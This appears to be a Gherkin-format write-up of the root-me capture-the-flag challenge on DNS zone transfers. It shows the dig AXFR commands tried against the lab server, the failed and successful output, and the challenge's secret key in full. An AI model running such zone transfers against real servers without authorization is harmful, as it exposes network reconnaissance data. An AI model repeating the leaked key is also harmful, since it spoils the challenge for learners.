# lenguage: en

Feature: Solve network-dns
  From root-me site
  Category Network
  With my usarname synapkg

  Background:
    Given I am running Ubuntu Xenial Xerus 16.04 (amd64)
    And I am using Mozilla Firefox Quantum 63.0 (64-bit)
    And I am using Gnome Terminal 3.18.3

  Scenario: First attempt fail
    Given the challenge URL
    """
    https://www.root-me.org/en/Challenges/Network/DNS-zone-transfert
    """
    Then I opened that URL with Mozilla Firefox
    And I read the problem statement
    """
    A not really dutiful administrator has set up a DNS service
    for the "ch11.challenge01.root-me.org" domain...

    Challenge connection informations :

    Host: challenge01.root-me.org
    Protocol: DNS
    Port: 54011
    """
    Then I was looking for about zone transfer DNS attack
    And I tried the follow command
    """
    dig @challenge01.root-me.org axfr -p 54011 challenge01.root-me.org
    """
    And return me
    """
    ; <<>> DiG 9.10.3-P4-Ubuntu <<>> @challenge01.root-me.org
     axfr -p 54011 challenge01.root-me.org
    ; (2 servers found)
    ;; global options: +cmd
    ; Transfer failed.
    """
    And I did not find an answer.

  Scenario: Successful attempt
    Then I tried to change the before command to
    """
    dig @challenge01.root-me.org axfr -p 54011 ch11.challenge01.root-me.org
    """
    And it returned me some records and one of them a txt record that it says
    """
    DNS transfer secret key : CBkFRwfNMMtRjHY
    """
    And I put the secret key and I was right
